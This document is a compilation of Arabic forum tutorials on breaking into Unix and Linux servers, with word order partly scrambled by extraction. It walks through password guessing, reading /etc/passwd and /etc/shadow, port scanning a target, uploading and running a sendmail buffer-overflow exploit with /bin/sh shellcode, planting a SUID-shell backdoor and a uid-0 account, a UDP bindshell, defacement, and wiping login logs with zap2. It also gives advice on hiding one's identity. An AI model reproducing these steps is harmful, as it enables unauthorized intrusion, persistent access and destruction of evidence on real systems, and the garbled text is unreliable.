بها القيام يستحسن التي العمليات عن الموضوع هذا يكون سوفالنظام على الدخول في والنجاح السر كلمة على الحصول ..بعدباستخدام بعضاالنظمة على تدخل ان يمكن بأنه تعرف ان يجب أوال
أمر بتنفيذ لك تسمح بعضاالنظمة وتوجد المشهورة الكلمات بعضهي األوامر تلك وأفضل ذلك بعد النظام من باخراجك تقوم ثم واحد
:.
who rwho finger
المستخدمين تستعرضاسماء بأنك األوامر هذه من وتستفيدوذلك نفساالسم من السر كلمة تستخرج ان يمكن وبذلك للنظام
ألسمه تقريبا مشابهة سر كلمة يستعمل المستخدمين بعض ألن .: مثل
username : Black password : Black2
بكتابة الدخول تستطيع بعضاألنظمة demo أو test وفي
على دخولك بعد استخراجها عليك يجب والتي المهمة الملفات مننظام .: أي
/etc/passwd
/etc/group /etc/hosts
/usr/adm/sulog /usr/adm/loginlog /usr/adm/errlog /usr/adm/culog
/usr/mail /usr/lib/cron/crontabs
/etc/shadow
.: bin الحسابمعظم به ويوجد المستخدم حساب على يحتوي حيث مهم وهو
فيمكن كذلك كان واذا السر كلمة ملف يوجد وقد المهمة الملفات( )أحيانا( لك ) روت دخول وتضيفحساب بك خاصة سر كلمة اضافة
!! كالتالي بسهولة .: والطريقةed passwd $
تقول مدير exec login وأخيرا انت تكون وبذلك اسم أي وتكتب !!النظام
واسم سر بكلمة نظام أي على دخولك عند تواجهه سوف الذي ما؟ !!مستخدم
االحتماالت هذه احدى ستقابل النظام الى دخولك .: عند ) انك ) أو الروت النظام مدير حساب على الحصول استطعت انك اما
آخر مستخدم حساب على ..حصلتالتالي االمر تكتب البداية .: في
pwd $ تظهر .: والنتيجة
usr/admin/ $ تستطيع وبذلك المدير على الدخول استطعت انك اظهرت النتيجة
قيود بدون النظام كامل مع ..التعاملفمثال .. النتيجة تلك غير نتيجة ظهرت : اذا
usr/Black/ $ المستخدم هذا حساب على دخلت انك على يدل !!فهذااآلتي تكتب المستخدم هذا .: ولعرضملفات
ls /usr/Black $ المستخدم هذا ملفات يعرضلك .: وسوف
mail pers
games bin
يعرضملف لن هذا profile. ولكناآلتي تكتب تستعرضه .: ولكي
cd $ ls -a $
: :
.profile $
التالي األمر تكتب ملففسوف محتويات قراءة اردت .: اذاcat letter $
هو المطلوب الملف ان افترضنا اذا letter وهذا
تكتب ان اال عليك فما السر كلمة تغيير اردت .: اذاpasswd $
!! كلمة وتدخل معك طبعا وهي القديمة السر كلمة منك سيطلب ثمالجديدة .. السر
التالي األمر تكتب معينة معلومة عن .: للبحثgrep phone Black $
اآلخر بالمستخدم الخاصة الهاتف ارقام طلبت انك بافتراض وهذا
اآلتي تكتب آخر ملف الى ملف من نسخ .: ولعملcp letter letters $
األمر فتكتب اتصال على آخر مستخدم مع محادثة عمل اردت اذا .: التاليwrite $
اآلتي نكتب النظام على يوجد من .: ولمعرفةwho $
safadM tty1 april 19 2:30 paul tty2 april 19 2:19
gopher tty3 april 19 2:31
ان يجب المظللة السر كلمات على المحتوي الملف قراءة اردت واذانفسه .. المدير حساب باستخدام النظام على دخلت قد تكون
نكتب السر كلمات .: والستعراضملفcat /etc/passwd $
root:F943/sys34:0:1:0000:/: sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
كالتالي للمدير آخر حساب يظهر .: وقدBlack:chips11,43:34:3:Mr doooom:/usr/Black:
ثالثة لمدة السر بكلمة االحتفاظ للمستخدم يمكن انه يعني وهذااسابيع ستة كل يغيرها ان يجب وانه تغيير بدون .. اسابيع
كالتالي المجموعة .: استعراضملف
ls /etc/group $
root::0:root adm::2:adm,root
bluebox::70:
اليحتوي أو سر كلمات على المجموعة ملف يحتوي ان !! ويمكنمديرا انت تصبح ان يمكن فانه سر كلمة على اليحتوي كان اذا
وليسكمدير عادي لمستخدم سر بكلمة دخولك حالة في للنظامطرق بعدة وذلك .. للنظام
،،،انتهى
عن " المواقع اختراق احتراف في الياء إلى األلف من مفصل شرحلينكس " طريق
>منقول<> ايسر: > الكاتب
UNix Usage IN HackinGجميعا بكم اهال
فعال .. الجميله الدروس من العديد هناك ان انوه ان احب البدايه فيليست و قديمه لكنها up to date و
يمكن للمبتدئين مكانا يكون لكي هذاالدرسالمطول لكم اكتب لذلكمنه يستفيدوا ان
اعجابكم على يحوز ان فعال اتمنى و- الهامه المصطلحات : بعض
ال من كل على يطلقوا ان الناسيحبون من , pc , servers كثيرsupercomputers غيرها و
BOX كلمهمن العديد على عاده يحتوي باختراقه نقوم سوف الذي النظام
لليوزرز .. باالضافه اليوزرزكلمه الرئيسهناك على تطلق ان هو ... root تسطيع و
, superuserيكونالنظام على المدير او االدمين هو ....و
التشغيل النظمه : بالنسبهالتشغيل .. نظام باستخدام تخترق ان يمكنك ال بل .. windows طبعا
اليونيكس التشغيل نظام من مشتق نظام اي الى .. تحتاجيصلح .. ... ال لماذا و بالذات االنظمه هذه لماذا هو السؤال حسنا
الويندوز؟؟: لسبيبن
1- لما ... نادر و اليونيكسسيستمز على شغاله اجهزه اغلبه االنترنتالويندوز على شغال جهاز nt . 9x تالقي
على شغال سيرفير او جهاز تخترق حتى حاجه اقل اذنهذا .. التشغيل بنظام ملما تكون ان يجب ..اليونيكس
جهازك في تركبه انك االفضل من .. لذا2- في .. للعمل مصممه االكسبلويتات اكواد و اادوات معظم طبعا
اليونيكس .. بيئه
اللينكس؟؟ ... اليونيكس؟؟و توزيعات هي ما اوكيقسمين .. الي منقسم فهو لليونيكس : بالنسبهمجاني .) ( -1 غير يونيكستجاري
مجاني -2 و المصدر open source يونيكسمفتوح
جهازك على تركبه ان يمكن ال التجاري لليونيكس بالنسبهاالن .. تجاهله فيمكنك لذا العادي
عائالت عده منه فيوجد المجاني اما-BSD
اال .. لك االفضل من و االستعمال في االصعب و االقدم هي والجهاز على سيرفير تركيب في ترغب كنت اذا اال تستعملها
...التعريف .. عن غني طبعا هو و اللينكس يوجد
هي .. افضلها كان ان و التوزيعات من العديد منه يوجد ( SuSe طبعاالتوزيعه هذه في الناسيشكرون من الكثير اسمع لكن و اجربها لم
(فهي توزيه السهل بالنسبه الدروس MDK اما بعض هنا ضعت و قد و
بالمندريك الخاصهقرائتها و تحميلها .. يمكنك
على مراسلتي اللينكسيمكنك على منه تحصل مكانا تجد لم انمكانا نحدد و ايميلي
الماندريك من نسخه هات 9لتسليمك الريد االسطوانات ) 7.2او ثمن فقط ( النسخ و البالنك
مجاني .. .. ... .. .. مستقر امن كثيره للينكسمميزات حال اي علىجهازك امكانيات ليالئم تطويره .. يمكنك
االنترنت -ام ... .. .. .. جهازك تخترق ان تريد جميل جميل تخترق ان تريد ماذا
؟؟ ماذاعلى.. ... .. نبحر دعنا اذن االنترنت في مبحره اجهزه تخترق ان تريد اه
االنترنت
كان .. هذا لكن االنترنت من الدرسده على حصلت انك عارف اناالويندوز طريق عن
.. .. ... فلسفه ذه لينكسي انسان انت مختلف انسان اليوم انت لكن.. محترمه
اساسا .. لن اليونيكس نظام من االنترنت الى تبحر ان يجب اذناللينكس على بتاعك المودم تعرف ان يجب
ان .. .. حتالقي المودم تعرف حاول عندك اللي التوزيعه حسب؟؟ بالجهاز موصل مودم اي يجد اللينكسلم
تتعجب .. ال هذا .. ماالداخليه المودمات عليها internal فكل .. winmodems يطلقون
التشغيل نظام تحت للعمل اساسا مصممه النها .. windows لماذااللينكس تلوم ال .. ارجوك
هذه الداخليه الفاكس كروت صانع تلوم ان يجب بلالخارجي .. للمودم بالنسبه اما حقيقي external اوكي مودم real فهو
or true modems مثل ... الخارجيه المودمز من العديد acorp , u.s. robotics يوجد
يكون المودم ان تتاكد ان ليس serial يجب USB وموضوعنا في خلينا حال اي ...على
ال .. خالل من االنترنت على ادخل نظام isp خالص خالل من وذلك الليونيكس
االيقاع يتم اال تحاول ان هي االختراق في الشروع قبل حاجه اهممعين سيريفير الختراق محاولتك كشف و .. بك
العديد هناك الن اليها اتطرق لن لذلك عديده سائل و هنك طبعا واالثر وازاله الحمايه مجال في المتميزه الشروح من
ثالثه او نقطتين في : الخصهم1- حتى .. ال و اختراقه تحاول موقع في تسجل ان تحاول ان ايكالخاصبك بي االي لكشف عرضه يجعلك قد هذا الن مزوره باسامي
ال ثم من ت ... isp و الفل صباح و هاتفك رقم ثمالهاك -2 بامور المهتمين غير اما ابدا باختراقاتك تتباهى ان ... اياك
3- فهمتني ... .. انت ال ال جهازك خالل من دائم تخترق اال احاولكافيه .. لنت تروح يعني مشقصدي غلط
لكن =====< ... .. مشمامون ده الضحيه الجهاز جهازك ... >====== كده======< ده الضحيه السيرفير وسيط جهاز جهازك
كويساوي .. من مخترق جهاز مثال يكون ممكن ده ده الوسيط الجهاز ايه طيب
اكاونت شيل او . قبل : من يمكنك حيث خدمه عن عباره هو اكاونت الشيل ماهو طيب
اليونيكس نظام عليه الجهاز هذا و بعيد من جهاز في التحكم خاللهاممن .. العديد يوجد و الجهاز هذا باختراق تقوم ان غير من طبعا
مجانا الحدمه هذا .. يقدمونمثل -4 مهمه و خطيره اجهزه تخترق ال ان او gov .mil. حاول
ان قبل عليك اجب النمط edu. سيرفيرات هذا من غيرها .واخفاء .. -5 لعمل الفريكينج بعضتقنيات على تعتمد النقطه هذه
لديك الخدمه مزود عن تليفونك REdirecting. لرقم
- ال ومنافذ المواقع : TCP فحص
االنترنت .. يمشي كيف تعرف ان باالختراق تقوم ان قبل عليك يجبيدعى بروتوكول على يعتمد TCP\IP انه
االخرى البروتوكوالت بعض .... وابوسايدك ... معايا ركز D= طيب
هذا .. مفتوحه بورتات فيه بيكون النت على جهاز كل المفروضانالداتا بارسال خاللها من تقوم ان يمكنك البورتات
فقط .. ) المفتوحه المفتوحه البورتات هذه الجهاز ذلك الى جهاز منبوكس( ريموت من الداتا لتلقي دائما استعدد على تكون
بخدمه يسمى بما المفتوحه البورتات ترتبط ما >> service.. دائماالخدمه هذا ديمون service و خالل من مستضافه daemon or تكون
server فانه .. السيرفير في بفتحه الموقع صاحب قام اذا هذا الديمون اذن
خالله .. من هذا الديمون يقوم لكي السيرفير في منفذ بفتح يقومالملعونه الخدمه D= بتقديم
هناك .. طبعا لكن بهم الخاصه البورتات مع الخدمات بعض هذه وكثيير
21 FTP FTPd23 Telnet telnetd
25 SMTP sendmail )yes!(80 HTTP apache110 POP3 qpop
كلمه d حرف اخر لكلمه ftp , telnet ..etc في daemon اختصار
المتصفح : خالل من العنوان هذا بزياره قمت سيادتك لو مثال www.host.netمثال ؟؟ يحدث ماالذي
ال بورت خالل من بالموقع باالتصال المتصفح 80رقم TCP يقوم االمر بارسال يقوم ثم
GET /HTTP/1.1 /index.html كثيره اخرى .. واوامرالخاص الهتمل كود بارسال المطلوب الموقع يقوم ذالك بعد ثم
index.html بالصفحه
ال ان الطريف الخطيره daemons الشيء االمنيه بالثغرات مليئه ديمحتاجينه... احنا اللي ده هوه و =<
ال اي تعرف ان يجب موقع باختراق تقوم لكي daemons اذنتعرف ان عليك يجب لذلك السيرفير عل الموجوده
كيف ... اذن المستهدف السيرفير في المفتوحه المنافذ ماهيهذه المعلومات عى .. تحصل
ال ما خالل تحول ... port scanersمن برامج عن عباره هي السكانرزذلك .. و المنافذ جميع خالل المستهدفمن بالسيرفير تتصل ان
المفتوحه البورتات اي لمعرفهاالداه ... هي السكانرز هذا اشهر السيرفير هذا بواسطه nmap في
fyodor !!.. ايه و بالويندوز خاصه منها نسخه يوجد الحظ لحسن و؟؟ .. ده
خالص ده الويندوز ننسى مشاتفقنا <= احناhttp://members.lycos.co.uk/linuxdude/e3sar/
نسخه.. على نحصل ان للينكسيمكننا بالنسبه هيئه nmap طيب علىrpm
التالي اتبع لتركيبها : وbash-2.03$ rpm -i nmap-2.53-1.i386.rpm
الدرس .. مدار على سنحاول الله شاء ان و بالتشغيل نقوم ثمالموقع مستهدف target.edu باستخدم لموقع .. كمثال
التالي : اتبعbash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by [email protected] ) www.insecure.org/nmap/ (
Interesting ports on target.edu )xx.xx.xx.xx(:)The 1518 ports scanned but not shown below are in state:
closed(Port State Service
21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address )1 host up( scanned in 34 seconds
ال قام لقد قام nmap اذن و الموقع على فحصشامل بعملترى كم المفتوحه المنافذ !!بمعرفه
ال و الخدمات اي ايضا نعرف ان يمكننا في daemonsاذن الموجوده target.edu الموقع
فكر .. المنافذ هذا احد من بالموقع لالتصال معينه اداه يلزمنا لكناالداه؟؟؟ هذه ماهي معي
التلنت .. .. .. خالل من خدمه هوه التلنت ان صحيح اه التلنت انها نعمعن .. عباره ايضا لكنه و ديمون
من .. معين بمنفذ موقع باي االتصال خالله من يمكنك بسيط برنامجال ... TCP خالل مثال نشوف : تعال
bash-2.03$ telnet target.edu 21Trying xx.xx.xx.xx...
Connected to target.edu.Escape character is '^]'.
220 target.edu FTP server )SunOS 5.6( ready.quit
221 Goodbye.Connection closed by foreign host
اهااااااوي اوي قيمه معلومات على دلونا دول
هو -1 هناك التشغيل SunOS 5.6 نظامال -2 هو هناك بي تي االف نظم standardديمون مع بييجي اللي
sunOS السن
التلنت من بيه نتصل تاني بورت نجرب : تعال
bash-2.03$ telnet target.edu 25Trying xx.xx.xx.xx...
Connected to target.edu.Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 )EDT(
quit221 2.0.0 target.edu closing connection
Connection closed by foreign host.
ديمون ان هي قيمه معلومات استفدنا ال smtp ايضا و sendmail هوهو ه اصدار 8.11.0/8.9.3ان
الن .. ؟؟ المعلومات هذا الى نحتج لماذا طيب حميل جميلعلى تعتمد دائما الموجوده الثغره و االكسبلويت
وهي .. daemon ال مشكله توجد لكن التشغيل نظام على و الموجودصحيحه غير او مزوره تكون ان يمكن قد المكعلومات بعض ان
كده معايا ؟؟؟تابع : ازاي nmap باالداه
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by [email protected] ) www.insecure.org/nmap/ (
Interesting ports on target.edu )xx.xx.xx.xx(:)The 1518 ports scanned but not shown below are in state:
closed(Port State Service
21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive incrementsDifficulty=937544 )Good luck!(
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address )1 host up( scanned in 34 seconds
اسود |: يانهارلينكس هو بتخمينه قامت االده اللي التشغيل !!!!!! نظام
الكلب !!!!!! sunOS مشكان الد و يا @= اه
نقول .. نقدر لكن اللينكسالوجوده توزيعه نعرف الزم برده بساحناتمشي ممكن و كفايه جمعناها اللي المعلومات ان
احد .. ممكن لكن و الموقع على سكان بعمل قمن احنا كده طيبحيكون ... نه اعتقد بفحصموقعه قمنا اننا ان عرف لو االدمينز
لذلك مننا يزعل االدمين مشعايزين حنا و منن زعالناالختيار يعتبر Ss- استخدمنا لموقع سكان عمل فان حل اي على
فيه مشاكل ال شرعي D= عملراجع المعلومات من :لمزيد
bash-2.03$ man nmap
اكونت شل على ادواتك .. رفع) من تخترق مشعايز و اكاونت شيل عندك كن اذا الخطوه هذه
) جهازكالتالي : اتبع
bash-2.03$ lsprogram.c
sh-2.03$ ftp shell.comConnected to shell.com
220 shell.com FTP server )SunOS 5.6( ready.Name: luser
331 Password required for luser.Password:
230 User luser logged in.ftp< put program.c
200 PORT command successful.150 ASCII data connection for program.c )204.42.253.18,57982(.
226 Transfer complete.ftp< quit
221 Goodbye
ا خالل ن الطريقه هذه ftpطبعاان لك يفضل لذلك اللوج ملفات بعمل تقوم النها محببه غير هي و
الشيل ملففي في لصقها و االكسبلويت سورسكود بنسح . تقومsh-2.03$ vi exploit.c
الكود الصق و بالشيل اتصل و تاني تيرمينال افتح ثم الكود انسخ ثمبامتداد سميه و ملف c.في
اكاونت للشيل بتاعتك االكسبلويت رفعت انت . كدهالهوست على رن اعملها بعدين و لالكسبلويت وكومبايل
المستهدفsh-2.03$ gcc program.c -o program
sh-2.03$ ./program
.. كل : بيها مسلم كقاعده دول االمرين تاخد انك اوي عيب ملحوظهفي طريقه له و الكومبايل في الخاصه اوامره له و اكسبلود
التشغيلال في او البرمجي التعليق في الطريقه هذا . usageتظهر
المختلفه - الثغرات -: استغاللالتشغيل . نظام ماهو تعرف ان بمجرد الموضوع في جزا اهم هذا
السيرفير على الشغاله الديمونز ايضا و المستهدف الموقع عنددي .. و اكسبلويت بتقدم اللي بيز دتا اي الى تذهب ان فيمكنك
االنترنت على بكثره موجودهhttp://www.linux.com.cn/hack.co.za
نظم .. و ديمونات الى مقسمه تتخيله ممكن حاجه كل فيه ده مثال تشغيل
؟؟ .. االكسبلويت ماهي لكن واو السي فبلغه مكتوب عاده سورسكود عن عباره االكسبلويت
ان المهم البيرلفي .. السيرفير في معينه منطقه باستغالل تقوم دي االكسبلويت
TARGET.EDU حالهب الخاصه االكسبلويت نستخدم ان اي sendmail 8.11.0 يمكننا او
اخر ديموناكبر هو ميل السند ان يقولوا اسمعهم ديما العيال فكره على
؟؟ .. اساسا ميل السند ايه مشعارف معرضلالختراق ديمونتعرف نت و للدرسده رووح : طيب
http://www.pharaonics.net/less/NEtworks/124.htmسيرفير . على اكسبلويت تشغل لما ان تعرفها الزم حاجه فيه
الموقع .. ) ( اختراق طبعا غير عليك جتعود اللي الفوائد ايه معينعادي .. شيل حاجه اول اتنين حاجتين على .... حتحصل
شيل بالرووت مايسمى لنا بالنسبه المهم ده و حاجه .. تانيتمتلك كده فانت اذن السيرفير على شيل رووت اخدت لو انت طبعا
تستعمل .. ممكن عايزه انت اللي كل تعمل ممكن و الصالحيات كفهالدرس اول في قلت ما زي سيط و كجهاز ده شيل الرووت
لالكسبلويتاتهي صغيره بيز www.securityfocus.com : دتاwww.insecure.org/sploits.html
.. يجب و االخرى عن مختلفه اكسبلويت كل ان قلت ما زي طيبلغه في تفهم ال كنت اذا التعليقات او بتاعها الكود تقرا ان عليك
.. البرمجههذه ... يقوم فلو اوفر البفر هي االكسبلويتات اشهر و اسهل من
الديمون ) ( في دربكه بعمل االكسبلويتتريده الذي الكود تشغيل الى يؤدي مم
شيل يسمى فهو لذلك السيرفير في شيل بتشغيل الكود هذا يقوم shell codeكود
ان .. علينا يجب لذلك التشغيل لنظام تبعا الكود هذا يختلف طبعاالسيرفير في المستخدم التشغيل نظم نعرف
ده نالقي ممكن معينه اكسبلويت كود شوفنا لوchar shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\ x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\ x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
دهه.. المسار في اللي الشيل بتشغيل يقوم للينكسو دهه اها/bin/sh
يجب اذن اخر تشغيل نظام على شغال بتاعك السيرفير لو طبعاكود الشيل تغير ان عليك
تالقيشيل .. ممكن طبعا المستهدف النظام يناسب اخر الى دهالمختلفه السيكيورتي مواقع في التشغيل نظم .كودسلجميع
...و .. االختراق في متستعملشجهازك انك البا عليك يجب قلت ما زي
الى .. لدخول طريقه اكاونت شيل او وسيطا جهازا تستخدم انماكالتالي اكاونت الشيل
bash-2.03$ telnet myshellaccount 23Trying xx.xx.xx.xx...
Connected to yourshellaccount.Escape character is '^]'.
Welcome to yourshellaccountlogin: malicioususer
Password: )it doesn't display(Last login: Fry Sep 15 11:45:34 from >yourIPaddress<.
sh-2.03
اسمها ميل للسند اكسبلويت عندنا لو exploit.c طيبتشغيله .. و الكومبايل عمل اوال يمكننا فلو اوفر بفر تعمل هي و
:كتالليsh-2.03$ gcc exploit.c -o exploit
sh-2.03$ ./exploitThis is a sendmail 8.9.11 exploit
usage: ./exploit target portsh-2.03$./exploit 25 target.edu
هناك ...$ شيل اخدنا اننا معنها جميل جميلالسيرفير على ايه وضعنا نشوف : تعال
$whoamiroot
رووت .. بقيت انا كده عيني )= ياعلى رووت مشبتخليك االكسبلويتت من العديد فيه طيب
هنال.. بسشيل تديك انما و السيستملوكل اخر اكسبلةيت برفع تقوم ن عليك يجب local لذلك
... رفع تتجنب ان تحاول ن تذكر النظام في الرروت على للحصول)= ( عايزينك احنا المستطاع قدر على بي تي باالف )االكسبلويتات
.. تي اي الباسورد ملف اظهار صالحيه تعطيك اخرى اكسبلويتات فيه>= سي
- دور باك -: وضعانت .. .. ؟؟؟فعال بعد ماذا السيستم على رووت اخذنا فقد اذن جميل
الرئيسيه الصفحه او الموقع بتغير تقوم ان امكانك فياالمر باستخدام او مكان اي االندكسفي عن تبحث ان عليك ما كل
.. فايندانك .. اوي عيب الن الالمرز شغل ده زعل غير من و بصراحه هذا لكن
موقع على عضالتك هذه edu. تفرد اختراق بامكانهم الهاكرز فاغلبالدومينات
مثل محترم موقع في الرئيسيه الصفحه بتغيير جديا انصحك لكن وmicrosoft.com , ibm.com etc
اي ... على الدين تسب التي او كاالباحيه المحتوى السيئه المواقع اودهه مشموضوعنا حل
اجهزه .. الثالث تذكر دهه بالموقع نحتفظ عايزين دلوقتي احنا طيب اياهم
>------ المستهدف-----< الجهاز وسيط جهاز . جهازكدلوقتي؟؟ ايه حنعمل اذن
كتبت .. لو انت حاجه للشيل exit في تعود و ده السيرفير بره حتطلعنفسالخطوات يلزمك تاني ترجع عشان و بتاعك
بتغيير قام قد االدمين يكون ان يحتمل قد الفتره هذه في وله جريد اب بعمل قام او المصاب باتشللديمون ركب او الباسورد
؟؟ .. الحل و عملها في االكسبلويت تفشل ان يؤدي ممانركب ... اذن نفسنا في اللي نعمل ممكن و رووت دلوقتي بساحنا
وقت اي في ذلك بعد بالعوده لنا يسمح دوور .. باكو .. يكشفه النورتون ان صعب اتاك الهاك هوه دور باك احسن
اه... |= |= ممك؟؟؟؟ ايسر يا ياد ده الكالم ايه
اتاك !!!!!! |= هاكنسيت )= ... اسف
الفاضي الكالم عن تماما تختلف ده موضوعي في دورز الباك طبعامؤاخذه ال و ده
لكم احطه شاء ان لواحده موضوع عايزالها دي دورز الباك طبعافقط .. االساسيات لكم ساذكر انا لكن .. قريبا
تعمل -1 ؟؟؟؟sushi ازايبعمل تقوم ال suid shell او sushi لكي بنسخ تقوم ان يلزمك
/bin/shال صالحيات باعطاءه نقوم و خفي مكان : كالتالي suid الى
sh-2.03$ cp /bin/sh /dev/nulهههههه
الدايركتوري داخل ينظر ال االدمين االحيان اغلب لو .. dev في واساسا ملف فيه الن غريب بشيء يشعر لن فانه دخله نظر و حصل
null اسمه=D اوي جدعان عيال احنا ده D= ال
sh-2.03$ cd /devsh-2.03$ chown root nul
عايزينها احنا اللي الصالحيات الشيل -: نعطيsh-2.03$ chmod 4775 nul
ال 4775 عايزينها suid معناها احنا . اللياالمر ان بالك بعض chmod +s nul خلي ميشتغلشفي ممكن
كله .. في بيعمل االول االمر مع خليك .. االنظمه
نشوف .. و كده بره نطلع تعالى مهمتنا خلصنا كدهsh-2.03$ exit
رجعنا 80بعد لو يوم =D حيحصل اللي كده نشوف : تعالsh-2.03$ whoami
lusersh-2.03$ /dev/nulsh-2.03$ whoami
root
سهوله بكل االن يوزرز سوبر )= احناال .. صالحيات اعطاء تمنع الشيلز من كثير في مشكله suid فيه
ال على مينفعشنحصل sushi يعنيخاص شيل المخترق للسيرفير نرفع ان يلزمنا الحاله هذه في و
اسمه ل sash تاني اختصار هو A stand-alone shell وبه خاصه اوامر ... ذو
ال صالحيات باعطاء يسمح هو االن bin/sh/ ل suidو نعمل نقدر اذنsushi ال
؟؟ -2 مزورين يوزرز نضيف كيفالملف في تغيير تعمل تقدر و رووت انت ممكن etc/passwd/ طبعا و
عايزه انت حد اي تضيف انك ده الملف خالل منالمحرر -: vi باستعمال
sh-2.03$ vi /etc/passwdالمحرر استخدام كيفيه عن فكره عندك يكون الزم vi طبعا
ده الشكل على يكون عادي يوزر لكل حتالقيسطر ده الملف فيluser:passwd:uid:gid:startdir:shell
ال بيكون يوزرز السوبر حاله uid & gid =0 فيده السطر اضف : اذن
dood::0:0 ood:/:/bin/sh للنظام يوزر سوبر اانتضفت كده و
sh-2.03$ su doodsh-2.03$ whoami
dood
االخ .. الن ليه رووت احنا ال dood طبعا من ال gid كل يساوي uid وصفر
تضع -3 ؟ bindshell كيفbindshell بال جد شبيه ديمون عن التلنت telnetd عباره الحقيقه في
شيل بايند عن عباره .. ديمون
ليسمنفذ لكنه و يعني منفذ او بورت بفتح يقوم هذا شيل البايندTCP منفذ UDP بل
البورت بهذا االتصال عند شيل بيعطيك طبعا .. وسكان يعمل ييجي لما االدمين انه الموضوع في الشيق و الطريفيكون السكن االحيان اغلب في و عاده للتامين بتاعه الجهاز علىال منافذ منافذ TCP على على سكان يعمل ان جدا نادرا و
UDP بروتوكول
االثار - ازاله -: عمليهترى .. .. فنكا حسابك الى بالدخول تقوم عندما اليونيكس نظاام فيرقم و بالدخول بها قمت مره باخر تعلمك الدخول اول عند رساله
منه دخلت الذي بي .. االيحيالقي دخل ده اليوزر كده بعد و يوزر باسم دخلت لو سيادتك يعني
دي الرساله
Last login: Sun Sep 24 10:32:14 from >yourIPaddress<.حتتكشف كده سيادتك طبعا و
يبلغه و يقوله و لالدمين ايميل حيبعت ناصح كان لو ده اليوزر النحصل باللي
يقوله و رساله حيبعتله الحال في االدمين طبع -: وبتاعه بي االي و بتاعك الحساب على دخل واحد ده واد يا متخافش
الله .. شاء ان ن و موجوودان و التلفون رقم عن اساله و المنطقه في الخدمه بمزود حاتصل
البوليس ابلغ .. شاءالشفا و بالهنا )= و
دي المناطق في موجوده دي المعلومات
/usr/adm/lastlog /var/adm/lastlog /var/log/lastlog
باستخدام مسحهم موقع lled يمكنك اي في تالقيها ممكن دي و.. مهتم
االستخدام تعرفطريقه لكي اقراه للمساعده ملف معاه ... بيكوناستخدام حاله ايضا ftp في معلومات ذلك يتخلفعن االدوات لرفع
ازالتها يمكنكالسابقه wted باستخدام باالده شبيه هو lled و
االمر طبقنا لو ؟؟ who ماذا الرووت معانا لقينا و
sh-2.03$ whoroot tty1 Sep 25 18:18
نستخدم دي الحاله في zap2 ممكناسمك : luser لو
sh-2.03$ ./zap2 luserZap2!
sh-2.03$ whosh-2.03$
اخيره : كلمهمن يمكنهم للمبتدئين بسيطه نبذه عن عباره هو الموضوع هذا
الله باذن موفقه بدايه .. البدايهرضاكم على يحوز ان .اتمنى
،،،انتهى
لينكس " طريق عن المواقع اختراق في " درساخر
> فلسطسن هاكر منتدى من >منقول> رعد: أبو > الكاتب
لينكس ...اختراق
أي به يقوم أحمق أو غبي تصرف أي عن مسؤوال لست كالعادة أنا والشخصية المعرفة زيادة و للعرض المعلومات هذه شخصو
بعملية للقيام األساسية الخطوات بشرح أقوم القسم هذا فيشروح أو معلومات أية لديك كان فإذا الشبكة على تخريب و اختراق
لنا بإرسالها القيام الرجاء القسم هذا في نشرها تود
الـــهـــكـــرالتعقيدات في الخول قبل بسيطة خلفية إلى حاجة في هنا نحن
على صالحيات على الحصول يعني تخريب أو اختراق قول إنالعادية األحوال في عليها بالحصول لنا يسمح ال الشبكات سيرفرات
منهم فرد لكل الناسو من العديد الستقبال معدة الشبكات فخوادمالفريسرفرز على حساب لراشد أن فالنفترض الشبكة على حساب
FreeServers.com االنترنت على خدمات مزود
بإعطائه سيقوم : الذي
الشبكة على راشد لمجلد التعريف هو و مستخدم اسم
قسمه و مجلده إلى للدخول مفتاحه هي و مرور كلمة
لراشد المتاحة الخدمات جميع إلى للوصول السبيل هما هذان و
واألصل اللب إلى الوصول على نركز سوف و
في تتمثل األولى نظام إلى للدخول رئيستان طريقتان هناكو بطيئة هي و مستخدم اسم و سر كلمة من خليط على الحصولو الخادم ضعف مناطق استغالل فهي الثانية الطريقة وأما نادرة
خاللها من التسلل
محولتك إكتشاف إن مطاردتك السهل من إلنه و ممنوع التخريب إنو الشبكة على تعريفك رقم أدرسفهو بي األي طريق عن لإلختراق
شبكتك خدمات لمزود خاطئة بينات بإعطاء تقوم أن هو الحل
المستخم اسم و السري الرقم لسرقة أدوات المخترقون يستخدمالبرامج أحد هذا و االنترنت مقاهي مثل العامة األماكن من
همية و ببيانات التسجيل أو األسهل هو هذا و البروكسي بتغيير قمخدمة بتعطيل قم و بخصوصية التصفح لك يضمن Caller ID لموقع
تعمل كانت إذا
المعلومات ... جمع هكر عملية ألي األولى الخطوة نأخذ اآلن نحن
بتشغيل قم اآلن جاهز أنك من notepade البد جديد متصفح ونافذةمثل آخر موقع أي أو بي أي محطم خالل
Hakkerz.home.ml.org بنسخ قم و موجود إيميل أي تسجيل و الموقع بفحص ألي html قم
مهمة صفحة
مثال موجود غير إيميل أقصد لهم همي و بإرسال قم
Blahblahblah@ الموقع اسم
امكانياته جميع واستخدام مجاني بريد موقع من بإرساله ينصح ومعه و إليه المرسل البريد جود عدم بسبب إيميل سيأتيك المهم
في الموجوده المعلومات الرسالة header بعض
عن المعلومات بعض لمعرفة تعقب أدوات إلى حاجة في اآلن أنتالضحية للخادم المزود
بي األي إلى ستحتاج التعريف IP أوال خدمة ثانيا لتحصل Whois وعنه معلومات عن
و عليه السيرفر نوع و الموقع مالكي عن معلومات سيعطيك الذيبتسجيلها قم
خاصية باستخدام عليك أوال finger اآلن جرب
الموقع @Finger اسم
ايميل جرب مفيدة تكون قد التي معلومات بإعطائك يقم لم إذا واألعلى في عليها حصلنا التي من
المنافذ بفحص القيام عليك بي scan ports اآلن حصلنا IP لألي الذيو الموقع يدعمها التي الخدمات و المفتوحة المنافذ تعرف لكي عليه
